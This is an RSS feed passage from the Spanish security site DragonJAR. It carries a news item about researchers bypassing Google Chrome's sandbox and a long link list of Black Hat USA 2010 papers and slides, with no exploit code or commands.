<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Bug</title> <atom:link href="http://www.dragonjar.org/tag/bug/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 01:08:12 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>0day en Google Chrome</title><link>http://www.dragonjar.org/0day-en-google-chrome.xhtml</link> <comments>http://www.dragonjar.org/0day-en-google-chrome.xhtml#comments</comments> <pubDate>Fri, 06 May 2011 06:10:55 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[0day]]></category> <category><![CDATA[0Days]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Chromium]]></category> <category><![CDATA[Google Chrome]]></category> <category><![CDATA[Navegador]]></category> <category><![CDATA[Navegadores]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=6267</guid> <description><![CDATA[Después de ser anunciado por 3 años consecutivos como el navegador mas seguro en el famoso Pwn2Own, Google Chrome ha caído, los responsables de esta hazaña han sido investigadores de la empresa VUPEN Security, quienes lograron saltar todas las medidas de seguridad implementadas por el navegador. Por mucho tiempo Google Chrome se escondió bajo su [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/05/chrome-bug.jpg" width="240" title="0day en Google Chrome" alt="chrome bug 0day en Google Chrome" /></p><p>Después de ser anunciado por 3 años consecutivos como el <a
href="http://www.dragonjar.org/tag/navegador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Navegador">navegador</a> mas seguro en el famoso Pwn2Own, <a
href="http://www.dragonjar.org/tag/google-chrome" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Google Chrome">Google Chrome</a> ha caído, los responsables de esta hazaña han sido investigadores de la empresa VUPEN Security, quienes lograron saltar todas las medidas de <a
href="http://www.dragonjar.org/tag/seguridad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Seguridad">seguridad</a> implementadas por el <a
href="http://www.dragonjar.org/tag/navegador" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Navegador">navegador</a>.<span
id="more-6267"></span></p><p>Por mucho tiempo Google Chrome se escondió bajo su caja de arena y las protecciones que le ofrecía el sistema operativo de turno, ASLR, DEP, pero ingenieros de la empresa VUPEN Security, encontraron el eslabón débil en la cadena de chrome, que durante varios años buscaron otros, logrando esquivar todas las protecciones implementadas en el navegador y ejecutar código arbitrario en el sistema de forma totalmente transparente para el usuario.</p><p
style="text-align: center;"><div
name="mediaspace" id="mediaspace"><div
class="pro-player-container" width="580px" height="360px"><div
id="pro-player-6267pp-single-4f36dd5ba34a9"></div></div></div><script type="text/javascript" charset="utf-8">var flashvars = {width: "580",height: "360",autostart: "false",repeat: "false",backcolor: "111111",frontcolor: "cccccc",lightcolor: "66cc00",stretching: "fill",enablejs: "true",mute: "false",skin: "http://www.dragonjar.org/wp-content/plugins/proplayer/players/skins/3dpixelstyle.swf",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",plugins: "",javascriptid: "6267pp-single-4f36dd5ba34a9",image: "http://www.dragonjar.org/wp-content/uploads/2011/12/DragonJARVideo.jpg",file: 'http://www.dragonjar.org/wp-content/plugins/proplayer/playlist-controller.<a href="http://www.dragonjar.org/tag/php" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con PHP">php</a>?pp_playlist_id=6267pp-single-4f36dd5ba34a9&sid=1328995675'};var params = {wmode: "transparent",allowfullscreen: "true",allowscriptaccess: "always",allownetworking: "all"};var attributes = {id: "obj-pro-player-6267pp-single-4f36dd5ba34a9",name: "obj-pro-player-6267pp-single-4f36dd5ba34a9"};swfobject.embedSWF("http://www.dragonjar.org/wp-content/plugins/proplayer/players/player.swf", "pro-player-6267pp-single-4f36dd5ba34a9", "580", "360", "9.0.0", false, flashvars, params, attributes);</script></p><p>Destaca la limpia ejecución de código en el sistema, con solo visitar un sitio <a
href="http://www.dragonjar.org/tag/web" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Web">web</a> y sin que el navegador se bloqueara, también el hecho que el fallo pueda ser recreado en sistemas de 32 y 64 Bits sin problemas.</p><p><strong>Mas Información:</strong><br
/> <a
href="http://www.vupen.com/demos/VUPEN_Pwning_Chrome.php">Anuncio Oficial en la pagina de VUPEN</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/google-chrome-podria-dejar-de-ser-el-navegador-mas-seguro.xhtml" title="Google Chrome podría dejar de ser el Navegador más Seguro">Google Chrome podría dejar de ser el Navegador más Seguro</a></li><li><a
href="http://www.dragonjar.org/el-navegador-mas-seguro.xhtml" title="&#8220;Crean&#8221; un navegador pensando en su seguridad">&#8220;Crean&#8221; un navegador pensando en su seguridad</a></li><li><a
href="http://www.dragonjar.org/buffer-overflow-en-php-6-dev.xhtml" title="Buffer Overflow en PHP 6 Dev">Buffer Overflow en PHP 6 Dev</a></li><li><a
href="http://www.dragonjar.org/vulnerabilidad-0-day-todos-los-windows.xhtml" title="Vulnerabilidad 0-day en todas las versiones de Windows">Vulnerabilidad 0-day en todas las versiones de Windows</a></li><li><a
href="http://www.dragonjar.org/descargar-instalar-google-chrome-os.xhtml" title="Descargar e Instalar Google Chrome OS">Descargar e Instalar Google Chrome OS</a></li><li><a
href="http://www.dragonjar.org/secuestro-de-frames-inocentes.xhtml" title="Secuestro de Frames Inocentes">Secuestro de Frames Inocentes</a></li><li><a
href="http://www.dragonjar.org/recupera-contrasenas-almacenadas-en-tu-navegador.xhtml" title="Recupera las contraseñas almacenadas en tu Navegador">Recupera las contraseñas almacenadas en tu Navegador</a></li><li><a
href="http://www.dragonjar.org/muy-bonito-muy-de-la-casa-muy-inseguro.xhtml" title="Muy Bonito, Muy de la Casa, MUY INSEGURO">Muy Bonito, Muy de la Casa, MUY INSEGURO</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/0day-en-google-chrome.xhtml/feed</wfw:commentRss> <slash:comments>8</slash:comments> </item> <item><title>Memorias del Black Hat USA 2010</title><link>http://www.dragonjar.org/memorias-del-black-hat-usa-2010.xhtml</link> <comments>http://www.dragonjar.org/memorias-del-black-hat-usa-2010.xhtml#comments</comments> <pubDate>Thu, 29 Jul 2010 05:59:29 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Eventos en seguridad]]></category> <category><![CDATA[2010]]></category> <category><![CDATA[5000 miles]]></category> <category><![CDATA[Black Hat]]></category> <category><![CDATA[black hat miniatures]]></category> <category><![CDATA[blackhat]]></category> <category><![CDATA[blackhat europe]]></category> <category><![CDATA[Bug]]></category> <category><![CDATA[Conferencias]]></category> <category><![CDATA[dan kaminsky]]></category> <category><![CDATA[def con]]></category> <category><![CDATA[Exploit]]></category> <category><![CDATA[Fyodor]]></category> <category><![CDATA[gray hat]]></category> <category><![CDATA[gray hat hacking]]></category> <category><![CDATA[grey hat]]></category> <category><![CDATA[IBM]]></category> <category><![CDATA[joanna rutkowska]]></category> <category><![CDATA[Memorias]]></category> <category><![CDATA[nigel bennett]]></category> <category><![CDATA[Papers]]></category> <category><![CDATA[penetration testing]]></category> <category><![CDATA[whitehat]]></category> <category><![CDATA[whitehats]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4765</guid> <description><![CDATA[Se ha liberado la documentación oficial del Blackhat USA, una de las conferencia de seguridad más importantes a nivel mundial, a continuación les dejo los contenidos expuestos en estas conferencias. Posiblemente encuentren los servidores saturados por la gran demanda que deben tener estos documentos en estos momentos. Anh Virt ICE Arlen SCADA Cyberdouchery olleb Hardening [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/08/BlackHat2010.jpg" width="240" title="Memorias del Black Hat USA 2010" alt="BlackHat2010 Memorias del Black Hat USA 2010" /></p><p>Se ha liberado la documentación <a
title="oficial" href="../tag/oficial">oficial</a> del Blackhat USA, una de las conferencia de <a
title="seguridad" href="../">seguridad</a> más importantes a nivel mundial, a continuación les dejo los contenidos expuestos en estas <a
title="conferencias" href="../tag/conferencias">conferencias</a>.</p><p
style="text-align: center;"><img
class="alignnone" title="Memorias BlackHat USA 2010" src="http://www.dragonjar.org/wp-content/uploads/2010/08/BlackHat2010.jpg" alt="BlackHat2010 Memorias del Black Hat USA 2010" width="500" height="180" /></p><p>Posiblemente encuentren los servidores saturados por la gran demanda que deben tener estos documentos en estos momentos.<span
id="more-4765"></span></p><ul><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Anh/BlackHat-USA-2010-Anh-Virt-ICE-wp.pdf">Anh Virt ICE</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Arlen/BlackHat-USA-2010-Arlen-SCADA-Cyberdouchery-slides.pdf">Arlen SCADA Cyberdouchery</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/olleb/BlackHat-USA-2010-olleb-Hardening-Windows-Applications-wp.pdf">olleb Hardening Windows Applications</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/olleb/BlackHat-USA-2010-olleb-Hardening-Windows-Applications-slides.pdf">olleb Hardening Windows Applications  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Bailey_DePetrillo/BlackHat-USA-2010-Bailey-DePetrillo-The-Carmen-Sandiego-Project-wp.pdf">Bailey DePetrillo The Carmen Sandiego Project</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Becherer/BlackHat-USA-2010-Becherer-Andrew-Hadoop-Security-wp.pdf">Becherer Andrew Hadoop Security</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Becherer/BlackHat-USA-2010-Becherer-Andrew-Hadoop-Security-slides.pdf">Becherer Andrew Hadoop Security  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Beek/BlackHat-USA-2010-Beek-Virtual-Forensics-slides.pdf">Beek Virtual Forensics</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Bolzoni_Schade/BlackHat-USA-2010-Bolzoni-Schade-Goodware-drugs-for-malware-slides.pdf">Bolzoni Schade Goodware drugs for malware</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Born/BlackHat-USA-2010-Born-psudp-Passive-Network-Covert-Communication-wp.pdf">Born psudp Passive Network Covert Communicatio</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Born/BlackHat-USA-2010-Born-psudp-Passive-Network-Covert-Communication-slides.pdf">Born psudp Passive Network Covert Communication  &#8211; Diapositivas</a><a
href="http://www.dragonjar.org">.</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Bugher/BlackHat-USA-2010-Bugher-Secure-Use-of-Cloud-Storage-wp.pdf">Bugher Secure Use of Cloud Storage</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Bugher/BlackHat-USA-2010-Bugher-Secure-Use-of-Cloud-Storage-slides.pdf">Bugher Secure Use of Cloud Storage  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Bursztein_Gourdin_Rydstedt/BlackHat-USA-2010-Bursztein-Bad-Memories-wp.pdf">Bursztein-Bad-Memories</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Cerrudo/BlackHat-USA-2010-Cerrudo-Toke-Kidnapping's-Revenge-wp.pdf">Cerrudo Toke Kidnapping&#8217;s Revenge</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Cerrudo/BlackHat-USA-2010-Cerrudo-Toke-Kidnapping's-Revenge-slides.pdf">Cerrudo Toke Kidnapping&#8217;s Revenge  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Bratus_Conti/BlackHat-USA-2010-Bratus-Conti-Taxonomy-wp.pdf">Bratus Conti Taxonomy</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Bratus_Conti/BlackHat-USA-2010-Bratus-Conti-Voyage-of-a-Reverser-slides.pdf">Bratus Conti Voyage of a Reverser  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Criscione/BlackHat-USA-2010-Criscione-Virtually-Pwned-slides.pdf">Criscione Virtually Pwned  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Cross/BlackHat-USA-2010-Cross-Internet-Wiretapping-slides.pdf">Cross Internet Wiretapping  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Dabirsiaghi/BlackHat-USA-2010-Dabirsiaghi-JavaSnoop-wp.pdf">Dabirsiaghi JavaSnoop</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Zovi/BlackHat-USA-2010-DaiZovi-Return-Oriented-Exploitation-slides.pdf">DaiZovi Return Oriented Exploitation  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Daswani/BlackHat-USA-2010-Daswani-mod-antimalware-wp.pdf">Daswani mod antimalware</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Daswani/BlackHat-USA-2010-Daswani-mod-antimalware-slides.pdf">Daswani mod antimalware  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Di_Croce/BlackHat-USA-2010-Di-Croce-SAP-Backdoors-wp.pdf">Di Croce SAP Backdoors</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-Creighton-Deconstructing-ColdFusion-slides.pdf">Eng Creighton Deconstructing ColdFusion  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Engebretson_Pauli_Cronin/BlackHat-USA-2010-Engebretson-Pauli-Cronin-SprayPAL-wp.pdf">Engebretson Pauli Cronin SprayPAL</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Engebretson_Pauli_Cronin/BlackHat-USA-2010-Engebretson-Pauli-Cronin-SprayPAL-slides.pdf">Engebretson Pauli Cronin SprayPAL  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Esser/BlackHat-USA-2010-Esser-Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits-slides.pdf">Esser Utilizing Code Reuse Or Return Oriented Programming In PHP Application Exploits  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Fayo/BlackHat-USA-2010-Fayo-Hacking-Protecting-Oracle-Databease-Vault-wp.pdf">Fayo Hacking Protecting Oracle Databease Vault</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Fayo/BlackHat-USA-2010-Fayo-Hacking-Protecting-Oracle-Databease-Vault-slides.pdf">Fayo Hacking Protecting Oracle Databease Vault  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Feinstein_Jarmoc_King/BlackHat-USA-2010-Jarmoc-Insecurities-in-Security-Infrastructure-wp.pdf">Jarmoc Insecurities in Security Infrastructure</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Feinstein_Jarmoc_King/BlackHat-USA-2010-King-Insecurities-in-Security-Infrastructure-wp.pdf">King Insecurities in Security Infrastructure</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Feinstein_Jarmoc_King/BlackHat-USA-2010-Insecurities-in-Security-Infrastructure-slides.pdf">Insecurities in Security Infrastructure  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/FX/BlackHat-USA-2010-FX-Blitzableiter-wp.pdf">FX Blitzableiter</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/FX/BlackHat-USA-2010-FX-Blitzableiter-slides.pdf">FX Blitzableiter  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Vaskovitch/BlackHat-USA-2010-Fyodor-Fifield-NMAP-Scripting-Engine-wp.pdf">Fyodor Fifield NMAP Scripting Engine</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Vaskovitch/BlackHat-USA-2010-Fyodor-Fifield-NMAP-Scripting-Engine-slides.pdf">Fyodor Fifield NMAP Scripting Engine  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Grenier_Johnson/BlackHat-USA-2010-Grenier-Johnson-Harder-Better-Faster-Stronger-wp.pdf">Grenier Johnson Harder Better Faster Stronger</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Grugq/BlackHat-USA-2010-Gurgq-Base-Jumping-slides.pdf">Gurgq Base Jumping  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Hamiel_Wielgoszewski/BlackHat-USA-2010-Hamiel-Wielgosweski-Constricting-the-Web-wp.pdf">Hamiel Wielgosweski Constricting the Web</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Hamiel_Wielgoszewski/BlackHat-USA-2010-Hamiel-Wielgosweski-Constricting-the-Web-slides.pdf">Hamiel Wielgosweski Constricting the Web  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Hansen_Sokol/Blackhat-USA-2010-Hansen-Sokol-HTTPS-Can-Byte-Me.pdf">Hansen Sokol HTTPS Can Byte Me</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Harbour/BlackHat-USA-2010-Harbour-Black-Art-of-Binary-Hijacking-slides.pdf">Harbour Black Art of Binary Hijacking  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Heffner/BlackHat-USA-2010-Heffner-How-to-Hack-Millions-of-Routers-wp.pdf">Heffner How to Hack Millions of Routers</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Heffner/BlackHat-USA-2010-Heffner-How-to-Hack-Millions-of-Routers-slides.pdf">Heffner How to Hack Millions of Routers  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Hypponen/BlackHat-USA_2010-Hypponen-You-will-be-billed-90000-for-this-call-slides.pdf">Hypponen You will be billed 90000 for this call  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Iozzo,Weinmann_Kornau/BlackHat-USA-2010-Iozzo-Weinmann-Kornau-Everybody-be-cool-this-is-a-roppery-slides.pdf">Iozzo Weinmann Kornau Everybody be cool this is a roppery  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Kamkar/BlackHat-USA-2010-Kamkar-How-I-Met-Your-Girlfriend-wp.pdf">Kamkar How I Met Your Girlfriend</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Kamkar/BlackHat-USA-2010-Kamkar-How-I-Met-Your-Girlfriend-slides.pdf">Kamkar How I Met Your Girlfriend  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Keltner/BlackHat-USA-2010-Keltner-Elrod-Adventures-In-Limited-User-Post-Exploitation-wp-v1.3.pdf">Keltner Elrod Adventures In Limited User Post Exploitation wp v1.3</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Kennedy_Kelly/BlackHat-USA-2010-Kennedy-Kelly-PowerShell-Its-Time-To-Own-slides.pdf">Kennedy Kelly PowerShell Its Time To Own  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Le/BlackHat-USA-2010-Le-Paper-Payload-already-inside-data-reuse-for-ROP-exploits-wp.pdf">Le Paper Payload already inside data reuse for ROP exploits</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Le/BlackHat-USA-2010-Le-Paper-Payload-already-inside-data-reuse-for-ROP-exploits-slides.pdf">Le Paper Payload already inside data reuse for ROP exploits  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Meer/BlackHat-USA-2010-Meer-History-of-Memory-Corruption-Attacks-wp.pdf">Meer History of Memory Corruption Attacks</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Meiners_Sor/Blackhat-USA-2010-Meiners-Sor-WEP-is-back-to-haunt-you-wp.pdf">Blackhat USA 2010 Meiners Sor WEP is back to haunt you</a><a
href="http://www.dragonjar.org">.</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Meiners_Sor/Blackhat-USA-2010-Meiners-Sor-WEP-is-back-to-haunt-you-slides.pdf">Meiners Sor WEP is back to haunt you  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Nagy/BlackHat-USA-2010-Nagy-Industrial-Bug-Mining-slides.pdf">Nagy Industrial Bug Mining  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Nohl/BlackHat-USA-2010-Nohl-Attacking.Phone.Privacy-wp.pdf">Nohl Attacking.Phone.Privacy</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Ocepek_Henderson/BlackHat-USA-2010-Henderson-Ocepek-Need-A-Hug-wp.pdf">Henderson Ocepek Need A Hug</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Ochoa_Azubel/BlackHat-USA-2010-Ochoa-Azubel-NTLM-Weak-Nonce-wp.pdf">Ochoa Azubel NTLM Weak Nonce</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Ochoa_Azubel/BlackHat-USA-2010-Ochoa-Azubel-NTLM-Weak-Nonce-slides.pdf">Ochoa Azubel NTLM Weak Nonce  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Jeongwook_Oh/BlackHat-USA-2010-Jeongwook-Oh-ExploitSpotting-Locating-Vulnerabilities-Out-Of-Vendor-Patches-Automatically-wp.pdf">Jeongwook Oh ExploitSpotting Locating Vulnerabilities Out Of Vendor Patches Automatically</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Jeongwook_Oh/BlackHat-USA-2010-Jeongwook-Oh-ExploitSpotting-Locating-Vulnerabilities-Out-Of-Vendor-Patches-Automatically-slides.pdf">Jeongwook Oh ExploitSpotting Locating Vulnerabilities Out Of Vendor Patches Automatically  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Ollmann/BlackHat-USA-2010-Ollmann-6millionDollarMan-wp.pdf">Ollmann 6millionDollarMan</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Ollmann/BlackHat-USA-2010-Ollmann-6millionDollarMan-slides.pdf">Ollmann 6millionDollarMan  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Parker/BlackHat-USA-2010-Parker-Finger-Pointing-for-Fun-Profit-and-War-0.2-slides.pdf">Parker Finger Pointing for Fun Profit and War 0.2  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Percoco_Llyas/Trustwave - SpiderLabs - BlackHat-USA-2010-Percoco-Llyas-Malware Freakshow-2010-wp.pdf">Percoco Llyas Malware Freakshow 2010</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Percoco_Llyas/Trustwave - SpiderLabs - BlackHat-USA-2010-Percoco-Llyas-Malware Freakshow-2010-slides.pdf">Percoco Llyas Malware Freakshow 2010  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Pollet_Cummins/BlackHat-USA-2010-Pollet-Cummings-RTS-Electricity-for-Free-wp.pdf">Pollet Cummings RTS Electricity for Free</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Raber_Cheatham/BlackHat-USA-2010-Raber-Cheatham-Reverse-Engineering-with-Hardware-Debuggers-slides.pdf">Raber Cheatham Reverse Engineering with Hardware Debuggers  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Rad/BlackHat-USA-2010-Rad-DMCA-wp.pdf">Rad DMCA</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Rad/BlackHat-USA-2010-Rad-DMCA-slides.pdf">Rad DMCA  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Rey_Mende/BlackHat-USA-2010-Mende-Graf-Rey-loki_v09-wp.pdf">Mende Graf Rey loki_v09</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Ristic/BlackHat-USA-2010-Ristic-Qualys-SSL-Survey-HTTP-Rating-Guide-wp-v1.pdf">Ristic Qualys SSL Survey HTTP Rating Guide wp v1</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Ristic/BlackHat-USA-2010-Ristic-Qualys-SSL-Survey-HTTP-Rating-Guide-slides.pdf">Ristic Qualys SSL Survey HTTP Rating Guide slide</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf">Ryan Getting In Bed With Robin Sage v1.0</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Shah/BlackHat-USA-2010-Shah-DOM-Hacks-Shreeraj-wp.pdf">Shah DOM Hacks Shreeraj</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Shah/BlackHat-USA-2010-Shah-DOM-Hacks-Shreeraj-slides.pdf">Shah DOM Hacks Shreeraj  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Shelton/BlackHat-USA-2010-Shelton-IBM-AIX-Heap-Overflow-Methods-wp.pdf">Shelton IBM AIX Heap Overflow Methods</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Shelton/BlackHat-USA-2010-Shelton-IBM-AIX-Heap-Overflow-Methods-slides.pdf">IBM AIX Heap Overflow Methods  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Siddharth/BlackHat-USA-2010-Siddharth-Hacking-Oracle-from-the-Web-wp.pdf">Siddharth Hacking Oracle from the Web</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Slaviero/BlackHat-USA-2010-Slaviero-Lifting-the-Fog-slides.pdf">Slaviero Lifting the Fog  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Smith/BlackHat-USA-2010-Smith-pyREtic-Reversing-wp.pdf">Smith pyREtic Reversing</a><a
href="http://www.dragonjar.org">.</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Smith_Lai/BlackHat-USA-2010-Smith-Lai-Balancing-the-Pwn-deficit-wp.pdf">Smith Lai Balancing the Pwn deficit</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Stender_Engel_Hill/BlackHat-USA-2010-Stender-Engel-Hill-Attacking-Kerberos-Deployments-wp.pdf">Stender Engel Hill Attacking Kerberos Deployments</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Stender_Engel_Hill/BlackHat-USA-2010-Stender-Engel-Hill-Attacking-Kerberos-Deployments-slides.pdf">Stender Engel Hill Attacking Kerberos Deployments  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Suiche/BlackHat-USA-2010-Suiche-Blue-Screen-of-the-Death-is-dead-wp.pdf">Suiche Blue Screen of the Death is dead</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Suiche/BlackHat-USA-2010-Suiche-Blue-Screen-of-the-Death-is-dead-slides.pdf">Suiche Blue Screen of the Death is dead  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Sullivan/BlackHat-USA-2010-Sullivan-Cryptographic-Agility-wp.pdf">USA 2010 Sullivan Cryptographic Agility</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Sullivan/BlackHat-USA-2010-Sullivan-Cryptographic-Agility-slides.pdf">Sullivan Cryptographic Agility  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Sumner/BlackHat-USA-2010-Sumner-Social-Net-Special-Ops-slides.pdf">Sumner Social Net Special Ops  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Thomas/BlackHat-USA-2010-Thomas-BlindElephant-WebApp-Fingerprinting-slides.pdf">Thomas BlindElephant WebApp Fingerprinting  &#8211; Diapositivas</a></li><li><a
href="https://media.blackhat.com/bh-us-10/whitepapers/Umadas_Alleny/BlackHat-USA-2010-Umadas-Allen-Network-Stream_Debugging-with-Mallory-wp.pdf">Umadas Allen Network Stream_Debugging with Mallory</a></li><li><a
href="https://media.blackhat.com/bh-us-10/presentations/Umadas_Alleny/BlackHat-USA-2010-Umadas-Allen-Network-Stream_Debugging-with-Mallory-slides.pdf">Umadas Allen Network Stream_Debugging with Mallory  &#8211; Diapositivas</a></li><li><a
